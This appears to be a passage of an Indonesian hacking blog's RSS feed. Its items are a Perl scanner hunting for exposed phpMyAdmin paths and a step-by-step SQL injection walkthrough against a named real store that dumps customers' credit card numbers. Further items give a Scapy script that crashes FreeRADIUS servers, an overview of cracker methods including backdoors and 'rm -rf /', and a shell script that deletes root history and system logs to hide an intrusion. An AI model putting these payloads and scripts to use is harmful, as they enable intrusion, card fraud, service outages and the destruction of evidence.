"/phpMyAdmin-2.7.0-beta1/",
"/phpMyAdmin-2.7.0-rc1/",
"/phpMyAdmin-2.7.0-pl1/",
"/phpMyAdmin-2.7.0-pl2/",
"/phpMyAdmin-2.7.0/",
"/phpMyAdmin-2.8.0-beta1/",
"/phpMyAdmin-2.8.0-rc1/",
"/phpMyAdmin-2.8.0-rc2/",
"/phpMyAdmin-2.8.0/",
"/phpMyAdmin-2.8.0.1/",
"/phpMyAdmin-2.8.0.2/",
"/phpMyAdmin-2.8.0.3/",
"/phpMyAdmin-2.8.0.4/",
"/phpMyAdmin-2.8.1-rc1/",
"/phpMyAdmin-2.8.1/",
"/phpMyAdmin-2.8.2/",
"/sqlmanager/",
"/mysqlmanager/",
"/p/m/a/",
"/PMA2005/",
"/pma2005/",
"/phpmanager/",
"/php-myadmin/",
"/phpmy-admin/",
"/webadmin/",
"/sqlweb/",
"/websql/",
"/webdb/",
"/mysqladmin/",
"/mysql-admin/");
open(IPLIST, $iplist) &#124;&#124; die "
* Error: File not found\n";
@raw_data=;
close(IPLIST);
print " Scan Started\n\n";
foreach $url (@raw_data)
**
chomp($url);
foreach $add (@path)
**
my $address = $url.$add;
my [...]]]></description>
			<content:encoded><![CDATA[<p>HiHiHiHiHiHi&#8230;dikasi tols temen nich&#8230;monggo yang mau nyoba&#8230;. <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/thumbup.gif" alt=":thumbup_tb:" /></p>
<p><code>#!/usr/bin/perl<br />
# phpMyAdmin Checker<br />
# Author: mHc@MimiZu (Re Edit) #<br />
use strict;<br />
use warnings;<br />
use LWP::UserAgent;<br />
use HTTP::Request;<br />
my ($add,$iplist,$url,@path,@raw_data);<br />
print q(<br />
phpMyAdmin Checker by mHc<br />
);<br />
if(@ARGV !=1) **<br />
print "Usage: perl phpmyadmin.pl e.g. perl phpmyadmin.pl iplist.txt";<br />
exit;<br />
}<br />
$iplist = shift;<br />
@path = (<br />
"/phpMyAdmin/",<br />
"/PMA/",<br />
"/admin/",<br />
"/dbadmin/",<br />
"/mysql/",<br />
"/myadmin/",<br />
"/phpmyadmin2/",<span id="more-50"></span><br />
"/phpMyAdmin2/",<br />
"/phpMyAdmin-2/",<br />
"/php-my-admin/",<br />
"/phpMyAdmin-2.2.3/",<br />
"/phpMyAdmin-2.2.6/",<br />
"/phpMyAdmin-2.5.1/",<br />
"/phpMyAdmin-2.5.4/",<br />
"/phpMyAdmin-2.5.5-rc1/",<br />
"/phpMyAdmin-2.5.5-rc2/",<br />
"/phpMyAdmin-2.5.5/",<br />
"/phpMyAdmin-2.5.5-pl1/",<br />
"/phpMyAdmin-2.5.6-rc1/",<br />
"/phpMyAdmin-2.5.6-rc2/",<br />
"/phpMyAdmin-2.5.6/",<br />
"/phpMyAdmin-2.5.7/",<br />
"/phpMyAdmin-2.5.7-pl1/",<br />
"/phpMyAdmin-2.6.0-alpha/",<br />
"/phpMyAdmin-2.6.0-alpha2/",<br />
"/phpMyAdmin-2.6.0-beta1/",<br />
"/phpMyAdmin-2.6.0-beta2/",<br />
"/phpMyAdmin-2.6.0-rc1/",<br />
"/phpMyAdmin-2.6.0-rc2/",<br />
"/phpMyAdmin-2.6.0-rc3/",<br />
"/phpMyAdmin-2.6.0/",<br />
"/phpMyAdmin-2.6.0-pl1/",<br />
"/phpMyAdmin-2.6.0-pl2/",<br />
"/phpMyAdmin-2.6.0-pl3/",<br />
"/phpMyAdmin-2.6.1-rc1/",<br />
"/phpMyAdmin-2.6.1-rc2/",<br />
"/phpMyAdmin-2.6.1/",<br />
"/phpMyAdmin-2.6.1-pl1/",<br />
"/phpMyAdmin-2.6.1-pl2/",<br />
"/phpMyAdmin-2.6.1-pl3/",<br />
"/phpMyAdmin-2.6.2-rc1/",<br />
"/phpMyAdmin-2.6.2-beta1/",<br />
"/phpMyAdmin-2.6.2-rc1/",<br />
"/phpMyAdmin-2.6.2/",<br />
"/phpMyAdmin-2.6.2-pl1/",<br />
"/phpMyAdmin-2.6.3/",<br />
"/phpMyAdmin-2.6.3-rc1/",<br />
"/phpMyAdmin-2.6.3/",<br />
"/phpMyAdmin-2.6.3-pl1/",<br />
"/phpMyAdmin-2.6.4-rc1/",<br />
"/phpMyAdmin-2.6.4-pl1/",<br />
"/phpMyAdmin-2.6.4-pl2/",<br />
"/phpMyAdmin-2.6.4-pl3/",<br />
"/phpMyAdmin-2.6.4-pl4/",<br />
"/phpMyAdmin-2.6.4/",<br />
"/phpMyAdmin-2.7.0-beta1/",<br />
"/phpMyAdmin-2.7.0-rc1/",<br />
"/phpMyAdmin-2.7.0-pl1/",<br />
"/phpMyAdmin-2.7.0-pl2/",<br />
"/phpMyAdmin-2.7.0/",<br />
"/phpMyAdmin-2.8.0-beta1/",<br />
"/phpMyAdmin-2.8.0-rc1/",<br />
"/phpMyAdmin-2.8.0-rc2/",<br />
"/phpMyAdmin-2.8.0/",<br />
"/phpMyAdmin-2.8.0.1/",<br />
"/phpMyAdmin-2.8.0.2/",<br />
"/phpMyAdmin-2.8.0.3/",<br />
"/phpMyAdmin-2.8.0.4/",<br />
"/phpMyAdmin-2.8.1-rc1/",<br />
"/phpMyAdmin-2.8.1/",<br />
"/phpMyAdmin-2.8.2/",<br />
"/sqlmanager/",<br />
"/mysqlmanager/",<br />
"/p/m/a/",<br />
"/PMA2005/",<br />
"/pma2005/",<br />
"/phpmanager/",<br />
"/php-myadmin/",<br />
"/phpmy-admin/",<br />
"/webadmin/",<br />
"/sqlweb/",<br />
"/websql/",<br />
"/webdb/",<br />
"/mysqladmin/",<br />
"/mysql-admin/");<br />
open(IPLIST, $iplist) || die "<br />
* Error: File not found\n";<br />
@raw_data=;<br />
close(IPLIST);<br />
print " Scan Started\n\n";<br />
foreach $url (@raw_data)<br />
**<br />
chomp($url);<br />
foreach $add (@path)<br />
**<br />
my $address = $url.$add;<br />
my $con = HTTP::Request-&gt;new(GET=&gt;$address);<br />
my $useragent = LWP::UserAgent-&gt;new;<br />
my $f = $useragent-&gt;request($con);<br />
if($f-&gt;is_success &amp;&amp; $f-&gt;status_line =~ /200/)<br />
**<br />
print "[!] Found: $address\n";<br />
open (F,"&gt;&gt;","found.txt");<br />
print F "$address\n";<br />
close(F);<br />
}<br />
}<br />
}</code></p>
<p>from : MiMiZu cRew</p>
]]></content:encoded>
			<wfw:commentRss>http://www.kukukakikukakukaku.com/phpmyadmin-scanner-tools.sonk/feed</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Hacking with SQL injection</title>
		<link>http://www.kukukakikukakukaku.com/hacking-with-sql-injection.sonk</link>
		<comments>http://www.kukukakikukakukaku.com/hacking-with-sql-injection.sonk#comments</comments>
		<pubDate>Thu, 22 Oct 2009 03:23:47 +0000</pubDate>
		<dc:creator>bento</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[carding]]></category>
		<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://www.kukukakikukakukaku.com/?p=35</guid>
		<description><![CDATA[Setelah sekian lama ga pernah nulis di blog..akhirnya ada temen yg minta dibikinin tutorial tentang sql Injection&#8230;  ,Cuma butuh sedikit logika + kreatifitas..Tapi ga pa², berhubung temen seperjuangan menuntut ilmu di negeri nyamuk&#8230;sapa tau ntar kalo dah gw bikinin dia mau bantu kesulitan yang saia alami…H!H!H!H!H!
Huyee&#8230;siapkan sebungkus starmild + kopi susu  
langsung sajoo, [...]]]></description>
			<content:encoded><![CDATA[<p>Setelah sekian lama ga pernah nulis di blog..akhirnya ada temen yg minta dibikinin tutorial tentang sql Injection&#8230; <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/devil.gif" alt=":devil_tb:" /> ,Cuma butuh sedikit logika + kreatifitas..Tapi ga pa², berhubung temen seperjuangan menuntut ilmu di negeri nyamuk&#8230;sapa tau ntar kalo dah gw bikinin dia mau bantu kesulitan yang saia alami…H!H!H!H!H!</p>
<p>Huyee&#8230;siapkan sebungkus starmild + kopi susu <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/smoke.gif" alt=":smoke_tb:" /> <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/drunk.gif" alt=":drunk_tb:" /><br />
langsung sajoo, misal pada site <a href="http://www.scootsusa.com/">http://www.scootsusa.com/</a>, kita cari link yang ada bugnya&#8230;<br />
kita dapet :<br />
<code>http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3</code><br />
Tinggal tambahin tanda petik satu (&#8217;) sajoo untuk test Vulnerbilitiesnya  <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/laugh.gif" alt=":laugh_tb:" /></p>
<p>alhasil muncul keterangan error seperti berikut :<br />
<code>1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1<br />
select * FROM customer_testimonials WHERE testimonials_id = 3\'</code></p>
<p>Sekarang kita kasi perintah order by&#8230;buat nyari ada berapa kolom di sana&#8230;<br />
<code>http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 order by 20--</code><br />
artinya kita coba cek langsung di binary 20, sekarang kita kurangin sampe muncul yang true&#8230;</p>
<p>ok..kita dapet yang true di binary 8<br />
<code>http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 order by 8--</code><br />
sedangkan yang ke 9 uda false, jadi kita dapet binarynya di angka 8.</p>
<p>Selanjutnya kita bajak pake union select.<br />
<code>http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 union all select 1,2,3,4,5,6,7,8--</code><br />
hasilnya :<br />
<code>Testimonial by 4<br />
3<br />
6<br />
</code></p>
<p>Langsung saja misal kita ambil angka 3 atau 6 juga bisa. <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/thumbup.gif" alt=":thumbup_tb:" /><br />
kita cek versi sqlnya doeloe&#8230;<br />
<code>http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 union all select 1,2,version(),4,5,6,7,8--</code><br />
hasilnya :<br />
<code>Testimonial by 4<br />
5.0.67.d7-ourdelta-log<br />
6</code><br />
ternyata sqlnya versi 5&#8230; lanjut bajak si kacrut&#8230; <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/thumbup.gif" alt=":thumbup_tb:" /></p>
<p>kemudian cari table dan coloumnya&#8230;<br />
<code>http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 union all select 1,2,table_name,4,5,6,7,8 from information_schema.tables where table_schema=database()--</code></p>
<p>nah lhoo kluar semua tuh nama tablenya&#8230;xixiixixixixi  <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/jittery.gif" alt=":jittery_tb:" /><br />
Berhubung sekarang kita mau cari data CC , kita ambil table yg nyimpen data² CC<br />
Biasanya CC ada di table orders.<br />
Karna kita dah nemu table orders,kita coba pake table orders. Table lainnya silahkan oprek sndiri yah&#8230; <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/thumbup.gif" alt=":thumbup_tb:" /></p>
<p>sekarang kita cari coloumnya&#8230; <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/guns.gif" alt=":guns_tb:" /><br />
sebelumnya kita konvert dolo table orders jadi hexa, jadinya 6F7264657273<br />
sebelumnya kita tambahin karakter 0x pada hasil convert tadi kemudian masukkan ke urlnya&#8230;<br />
<code>http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 union all select 1,2,column_name,4,5,6,7,8 from information_schema.columns where table_name=0x6F7264657273--</code></p>
<p>Alhasil keluar tuh coloum²nya&#8230;hohoho<br />
payment_method,cc_type,cc_owner,cc_number,cc_expires, dll</p>
<p>ok skarang kita masukkan data² tadi dan haslinya&#8230;  <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/shock.gif" alt=":shock_tb:" /><br />
<code>http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 union select 1,2,concat_ws(0x3a,payment_method,cc_type,cc_owner,cc_number,cc_expires),4,5,6,7,8 from orders--</code></p>
<p>dan&#8230;eng..ing..eng&#8230;xixixixiixixixi <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/clap.gif" alt=":clap_tb:" /></p>
<p>semoga aja itu bisa sedikit membantu temen² yg pengen belajar SQL injection..Ini semua hanya sebagai pengetahuan sajooo&#8230;saia tidak ikod bertanggung jawab jika di salah pergunakan&#8230;  <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/flush.gif" alt=":flush_tb:" /></p>
<p>salam hangat&#8230;<br />
banksonk</p>
]]></content:encoded>
			<wfw:commentRss>http://www.kukukakikukakukaku.com/hacking-with-sql-injection.sonk/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Freeradius Packet of Death</title>
		<link>http://www.kukukakikukakukaku.com/freeradius-packet-of-death.sonk</link>
		<comments>http://www.kukukakikukakukaku.com/freeradius-packet-of-death.sonk#comments</comments>
		<pubDate>Wed, 21 Oct 2009 02:59:50 +0000</pubDate>
		<dc:creator>bento</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Network]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[ddos]]></category>
		<category><![CDATA[radius]]></category>

		<guid isPermaLink="false">http://www.kukukakikukakukaku.com/?p=31</guid>
		<description><![CDATA[I haven’t had a chance to use Scapy in a little while, and I don’t spend hardly any time in Python (don’t really know the language at all, to be honest), but a long time ago I was searching for an IPv6 capable successor to Hping. Scapy almost fits the bill.
Earlier today, while reading through [...]]]></description>
			<content:encoded><![CDATA[<p>I haven’t had a chance to use <a href="http://www.secdev.org/projects/scapy/doc/index.html">Scapy </a>in a little while, and I don’t spend hardly any time in Python (don’t really know the language at all, to be honest), but a long time ago I was searching for an IPv6 capable successor to <a href="http://www.hping.org/">Hping</a>. Scapy almost fits the bill.</p>
<p>Earlier today, while reading through <a href="http://www.gossamer-threads.com/lists/fulldisc/">Full Disclosure</a>, I came across something interesting: a <a href="http://www.gossamer-threads.com/lists/fulldisc/full-disclosure/69935">Freeradius DoS bug</a>. This piqued my interest as I’m currently experiencing _something_ that’s periodically knocking over radiusd. Furthermore, the radius server in question talks to a router with problematic L2TP tunnels (caused by a software bugs in L2TP sequencing on the Telco router on the other end…their vendor has confirmed the problems)</p>
<p>Time to create the packet of death. Scapy doesn’t appear to have a layer for RadiusAttributes yet, thankfully it IS in their <a href="http://trac.secdev.org/scapy/attachment/ticket/92/radiuslib.py">Trac</a>.</p>
<p>So, download the layer to scapy/layers, ensure that it imports the required items:<br />
<code>    import struct<br />
    from scapy.packet import *<br />
    from scapy.fields import *<br />
    from scapy.layers.inet import UDP</p>
<p>    from scapy.layers.radius import Radius</code><br />
Add “radiuslib” to the load_layers array in config.py, and we’re ready to go:<br />
<code>    #!/usr/bin/env python<br />
    # FreeRadius Packet Of Death<br />
    # Matthew Gillespie 2009-09-11<br />
    import sys<br />
    from scapy.all import IP,UDP,send,Radius,RadiusAttr<br />
    if len(sys.argv) != 2:<br />
    print “Usage: radius_killer.py <radiushost>\n”<br />
    sys.exit(1)<br />
    PoD=IP(dst=sys.argv[1])/UDP(sport=60422,dport=1812)/ \<br />
    Radius(code=1,authenticator=”\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99″,id=180)/ \<br />
    RadiusAttr(type=69,value=”",len=2)<br />
    send(PoD)</code></p>
<p>Interestingly, one doesn’t need a shared key to send the packet of death, as you can tell the authenticator for the Access-Request packet is pulled out of thin air.</p>
<p>I’m assuming that most people iptable off access to their radius servers, so playing whack-a-mole with a provider probably isn’t that do-able. Beyond that, to even come close to possibly exploiting this, you need to be listed in clients.conf – so there’s already that level of trust.  Correct me if I’m wrong. Either way, updated packages are available.</p>
<p>source : <a href="http://www.braindeadprojects.com">www.braindeadprojects.com</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.kukukakikukakukaku.com/freeradius-packet-of-death.sonk/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Belajar Menjadi Hacker</title>
		<link>http://www.kukukakikukakukaku.com/belajar-menjadi-hacker.sonk</link>
		<comments>http://www.kukukakikukakukaku.com/belajar-menjadi-hacker.sonk#comments</comments>
		<pubDate>Tue, 20 Oct 2009 09:28:30 +0000</pubDate>
		<dc:creator>bento</dc:creator>
				<category><![CDATA[Coretan]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://www.kukukakikukakukaku.com/?p=27</guid>
		<description><![CDATA[Pada saat saya menulis ini, saya sangat berharap bahwa ilmu keamanan jaringan nantinya digunakan untuk hal-hal yang baik. Jangan sampai anda terkena karma karena menggunakan ilmu untuk merusak milik orang lain. Apalagi, pada saat ini kebutuhan akan hacker semakin bertambah di Indonesia dengan semakin banyak dotcommers yang ingin IPO di berbagai bursa saham. Nama baik [...]]]></description>
			<content:encoded><![CDATA[<p>Pada saat saya menulis ini, saya sangat berharap bahwa ilmu keamanan jaringan nantinya digunakan untuk hal-hal yang baik. Jangan sampai anda terkena karma karena menggunakan ilmu untuk merusak milik orang lain. Apalagi, pada saat ini kebutuhan akan hacker semakin bertambah di Indonesia dengan semakin banyak dotcommers yang ingin IPO di berbagai bursa saham. Nama baik sebuah dotcom akan jatuh jika situs mereka sampai bobol, rekan-rekan hacker sangat di harapkan menjadi konsultan keamanan bagi para dotcommers tersebut.</p>
<p>Berbagai teknik keamanan jaringan Internet dapat di peroleh secara mudah di Internet antara lain di <a href="http://www.sans.org">http://www.sans.org</a>, <a href="http://www.rootshell.com">http://www.rootshell.com</a>, <a href="http://www.linuxfirewall.org/">http://www.linuxfirewall.org/</a>, <a href="http://www.cerias.purdue.edu/coast/firewalls/">http://www.cerias.purdue.edu/coast/firewalls/</a>, <a href="http://www.redhat.com/mirrors/LDP/HOWTO/VPN-Masquerade-HOWTO.html">http://www.redhat.com/mirrors/LDP/HOWTO/VPN-Masquerade-HOWTO.html</a>. Beberapa Frequently Asked Questions (FAQ) tentang keamanan jaringan bisa diperoleh di <a href="http://www.iss.net/vd/mail.html">http://www.iss.net/vd/mail.html</a>, <a href="http://www.v-one.com/documents/fw-faq.htm">http://www.v-one.com/documents/fw-faq.htm</a>. Dan bagi para experimenter beberapa script / program yang sudah jadi dapat diperoleh antara lain di <a href="http://bastille-linux.sourceforge.net/">http://bastille-linux.sourceforge.net/</a>, <a href="http://www.redhat.com/support/docs/tips/firewall/firewallservice.html">http://www.redhat.com/support/docs/tips/firewall/firewallservice.html</a>.</p>
<p>Cara paling sederhana untuk melihat kelemahan sistem adalah dengan cara mencari informasi dari berbagai vendor misalnya di <a href="http://www.sans.org/newlook/publications/roadmap.htm">http://www.sans.org/newlook/publications/roadmap.htm</a>#3b tentang kelemahan dari sistem yang mereka buat sendiri. Di samping, memonitoring berbagai mailing list di Internet yang berkaitan dengan keamanan jaringan seperti dalam daftar http://www.sans.org/newlook/publications/roadmap.htm#3e.</p>
<p>Pada dasarnya dunia hacker &#038; cracker tidak berbeda jauh dunia seni kebetulan disini kita berbicara tentang seni perang &#038; seni keamanan jaringan. Seperti dijelaskan oleh Front-line Information Security Team, “Techniques Adopted By &#8216;System Crackers&#8217; When Attempting To Break Into Corporate or Sensitive Private Networks,” fist@ns2.co.uk http://www.ns2.co.uk. Seorang cacker umumnya pria usia 16-25 tahun. Melakukan cacking untuk meningkatkan kemampuan atau menggunakan sumber daya di jaringan untuk kepentingan sendiri. Umumnya cracker adalah opportunis. Melihat kelemahan sistem dengan mejalankan program scanner. Setelah memperoleh akses root, umumnya cracker akan menginstall pintu belakang (backdoor) dan menutup semua kelemahan umum yang ada.</p>
<p>Seperti kita tahu bahwa umumnya berbagai perusahaan / dotcommers akan menggunakan Internet untuk (1) hosting web server mereka, (2) komunikasi e-mail dan (3) memberikan akses web / internet kepada karyawan-nya. Pemisahan jaringan Internet dan IntraNet umumnya dilakukan dengan menggunakan teknik / software Firewall dan Proxy server. Melihat kondisi penggunaan di atas, kelemahan sistem umumnya dapat di tembus misalnya dengan menembus mailserver external / luar yang memudahkan akses ke mail server dalam perusahaan. Dengan menggunakan agressive-SNMP scanner &#038; program yang memaksa SNMP community string dapat mengubah sebuah router menjadi bridge (jembatan) yang kemudian dapat digunakan untuk batu loncatan.</p>
<p>Agar cracker terlindungi pada saat melakukan serangan, teknik cloacking dilakukan dengan cara melompat dari mesin yang sebelumnya telah di compromised (ditaklukan) melalui program telnet atau rsh. Pada mesin Windows serangan dapat dilakukan dengan melompat dari software wingate. Atau melompat dari mesin yang menggunakan proxy yang konfigurasinya kurang baik.</p>
<p>Setelah berhasil melompat dan memasuki sistem lain, cracker harus melakukan probing terhadap jaringan dan mengumpulkan informasi yang dibutuhkan. Hal ini dilakukan dengan beberapa cara, misalnya (1) menggunakan nslookup untuk menjalankan perintah  &#8216;ls <domain or network>&#8216; , (2) melihat file HTML di webserver anda untuk mengidentifikasi mesin lainnya, (3) melihat berbagai dokumen di FTP server, (4) menghubungkan diri ke mail server dan menggunakan perintah &#8216;expn <user>&#8216;, dan (5) mem-finger user di mesin-mesin eksternal lainnya.</p>
<p>Langkah selanjutnya, cracker akan mengidentifikasi komponen jaringan yang dipercaya oleh system apa saja. Komponen jaringan tersebut biasanya mesin administrator dan server yang biasanya di anggap paling aman di jaringan. Start dengan check akses &#038; eksport NFS ke berbagai direktori yang kritis seperti /usr/bin, /etc dan /home. Eksploitasi mesin melalui kelemahan Common Gateway Interface (CGI), dengan akses ke file /etc/hosts.allow.</p>
<p>Selanjutnya cracker harus mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan. Cracker bisa mengunakan program di Linux seperti ADMhack, mscan, nmap dan banyak scanner kecil lainnya. Program seperti &#8216;ps&#8217; &#038; &#8216;netstat&#8217; di buat trojan (ingat cerita kuda troya?) untuk menyembunyikan proses scanning. Bagi cracker yang cukup advanced dapat mengunakan aggressive-SNMP scanning untuk men-scan peralatan dengan SNMP.</p>
<p>Setelah cracker berhasil mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan, maka cracker akan menjalan program untuk menaklukan program daemon di server yang lemah. Selanjutnya cracker dapat dengan mudah memperoleh akses sebagai ‘root’ (administrator tertinggi di server).</p>
<p>Untuk menghilangkan jejak, seorang cracker perlu melakukan operasi pembersihan &#8216;clean-up‘ operation dengan cara membersihkan berbagai log file. Dan menambahkan program untuk masuk dari pintu belakang &#8216;backdooring&#8217;. Mengganti file .rhosts di /usr/bin untuk memudahkan akses ke mesin yang di taklukan melalui rsh &#038; csh.</p>
<p>Selanjutnya seorang cracker dapat menggunakan mesin yang sudah ditaklukan untuk kepentingannya sendiri, misalnya mengambil informasi sensitif yang seharusnya tidak dibaca, cracking mesin lain dengan melompat dari mesin yang di taklukan, memasang sniffer untuk melihat / mencatat berbagai trafik / komunikasi yang lewat, bahkan bisa mematikan jaringan dengan cara menjalankan perintah ‘rm –rf / &#038;’.</p>
<p>Oleh karena itu semua mesin &#038; router yang menjalankan misi kritis sebaiknya selalu di periksa keamanannya &#038; di patch oleh software yang lebih baru.</p>
<p>from : Onno W. Purbo</p>
]]></content:encoded>
			<wfw:commentRss>http://www.kukukakikukakukaku.com/belajar-menjadi-hacker.sonk/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Remove Log File on Linux and Unix Family</title>
		<link>http://www.kukukakikukakukaku.com/remove-log-file-on-linux-and-unix-family.sonk</link>
		<comments>http://www.kukukakikukakukaku.com/remove-log-file-on-linux-and-unix-family.sonk#comments</comments>
		<pubDate>Mon, 19 Oct 2009 08:38:57 +0000</pubDate>
		<dc:creator>bento</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Irc]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Server]]></category>
		<category><![CDATA[auth]]></category>
		<category><![CDATA[logs]]></category>

		<guid isPermaLink="false">http://www.kukukakikukakukaku.com/?p=25</guid>
		<description><![CDATA[sebenernya simple saja untuk menghapus jejak² waktu mendaki guNung&#8230;dan yang jelas harus dapet hak super user/root&#8230;. 
langsung sajoo berikut scriptnya&#8230;:
#!/bin/sh
clear
echo "Luna beraksi beresin meja kerja"
echo " "
echo "Misi - misi gaN numpang lewaT"
echo "JangaN jaDi tuKaNg saPu mBoud..!!!"
echo "BiariN gaN jaNgaN siRik aH...apa biBir juRagaN saia saPu pake niH bibiR...!!!"
echo "saia bersiHkan si kaCrut dulu [...]]]></description>
			<content:encoded><![CDATA[<p>sebenernya simple saja untuk menghapus jejak² waktu mendaki guNung&#8230;dan yang jelas harus dapet hak super user/root&#8230;. <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/smoke.gif" alt=":smoke_tb:" /><br />
langsung sajoo berikut scriptnya&#8230;:<br />
<code>#!/bin/sh<br />
clear<br />
echo "Luna beraksi beresin meja kerja"<br />
echo " "<br />
echo "Misi - misi gaN numpang lewaT"<br />
echo "JangaN jaDi tuKaNg saPu mBoud..!!!"<br />
echo "BiariN gaN jaNgaN siRik aH...apa biBir juRagaN saia saPu pake niH bibiR...!!!"<br />
echo "saia bersiHkan si kaCrut dulu gaN.....!!!"<br />
rm -f ~root/.bash_history --> untuk del history perintah yang sudah pernah dilakukan<br />
rm -f /var/log/apache2/access.* --> untuk delete log apache/http yang sukses<br />
rm -f /var/log/apache2/error.* -->untuk delete log apache/http yang gagal/error<br />
rm -f /var/log/httpd/access.* --> untuk delete log apache/http yang sukses<br />
rm -f /var/log/httpd/error.* -->untuk delete log apache/http yang gagal/error<br />
rm -f /var/log/netconf.log --> untuk delete konfigurasi managemen network<br />
rm -f /var/log/boot.log --> untuk delete log booting system<br />
rm -f /var/log/messages --> untuk delete log semua kegiatan yang pernah dilakukan pada system<br />
rm -f /var/log/secure --> untuk delete log ssh<br />
rm -f /var/log/xferlog --> untuk delete log ftp<br />
rm -f /var/log/proftpd --> untuk delete log ftp<br />
echo "BersiH² sudaH beres gaN...!!!"<br />
echo "Beginilah nasib jadi pembantu.....HufT...Hikz..Hikz.."<br />
echo "BikiN SapiTeNk laGee gaN...!!!"<br />
touch ~root/.bash_history<br />
touch /var/log/apache2/access.log<br />
touch /var/log/apache2/error.log<br />
touch /var/log/httpd/access.log<br />
touch /var/log/httpd/error.log<br />
touch /var/log/netconf.log<br />
touch /var/log/boot.log<br />
touch /var/log/messages<br />
touch /var/log/secure<br />
touch /var/log/xferlog<br />
touch /var/log/proftpd<br />
echo "Selalu disuruh² eh... malah diperkosa lagi...HuaH....GeLi aH gaN...uH laGe dunt...!!"<br />
echo "saiaH kasi piL KB doLo gaN biaR bisa HaLim eh haMiL....emmmm..."<br />
echo " "<br />
chmod 0664 ~root/.bash_history<br />
chmod 0664 /var/log/apache2/access.log<br />
chmod 0664 /var/log/apache2/error.log<br />
chmod 0664 /var/log/httpd/access.log<br />
chmod 0664 /var/log/httpd/error.log<br />
chmod 0664 /var/log/netconf.log<br />
chmod 0664 /var/log/boot.log<br />
chmod 0664 /var/log/messages<br />
chmod 0664 /var/log/secure<br />
chmod 0664 /var/log/xferlog<br />
chmod 0664 /var/log/proftpd<br />
echo " "<br />
echo "Kerjaan siap gaN!! : ... "<br />
echo "gaN... gaN... Minta Seribu gaN... Belum Makan gaN... "<br />
echo " " </code></p>
<p>keterangan :<br />
<code>echo = menampilkan text<br />
rm = perintah untuk remove<br />
touch = untuk membuat file kosong<br />
chmod = merubah permision file </code></p>
<p>buat file dengan nama terserah, misal luna.sh dengan perintah<br />
<code>nano luna.sh<br />
atau<br />
vi luna.sh<br />
atau<br />
vim luna.sh<br />
atau<br />
pico luna.sh</code></p>
<p>kemudian isi file tersebut dengan script diatas dan save&#8230;<br />
setelah itu beri permision agar file sersebut bisa di esekusi, dengan perintah :<br />
<code>chmod +x luna.sh</code></p>
<p>setelah itu esekusi file dengan perintah :<br />
<code>./luna.sh</code></p>
<p>hanya sekedar info dan pembelajaran saja, tidak untuk disalah pergunakan&#8230;dan sekalipun disalah pergunakan saya tidak ikut bertanggung jawab&#8230;.!!! <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/devil.gif" alt=":devil_tb:" /></p>
<p>salam hangat&#8230;<br />
banksonk</p>
]]></content:encoded>
			<wfw:commentRss>http://www.kukukakikukakukaku.com/remove-log-file-on-linux-and-unix-family.sonk/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

